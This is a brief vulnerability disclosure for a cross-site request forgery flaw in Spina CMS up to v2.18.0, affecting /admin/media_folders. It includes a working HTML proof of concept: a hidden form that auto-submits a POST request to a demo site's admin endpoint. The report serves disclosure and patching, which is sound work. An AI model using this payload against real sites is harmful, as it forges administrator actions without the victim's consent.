[description]
Spina CMS v2.18.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the URI /admin/media_folders.
[Vulnerability Type]
Cross-Site Request Forgery (CSRF)
[Vendor of Product]
Spina CMS,https://github.com/SpinaCMS/Spina
[Affected Product Code Base]
<=v2.18.0
[Impact Escalation of Privileges]
true
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://spinacms-demo.herokuapp.com/admin/media_folders" method="POST">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="authenticity_token" value="YHbA/a9JxqaH6dBpw3EnP/vL2WzJM6L8obuUr1uIhkUlET/JRM987f66bvcMD8BHXIsfY0WLMinCaXd+k+Ka7Q==" />
<input type="hidden" name="media_folder[name]" value="123" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>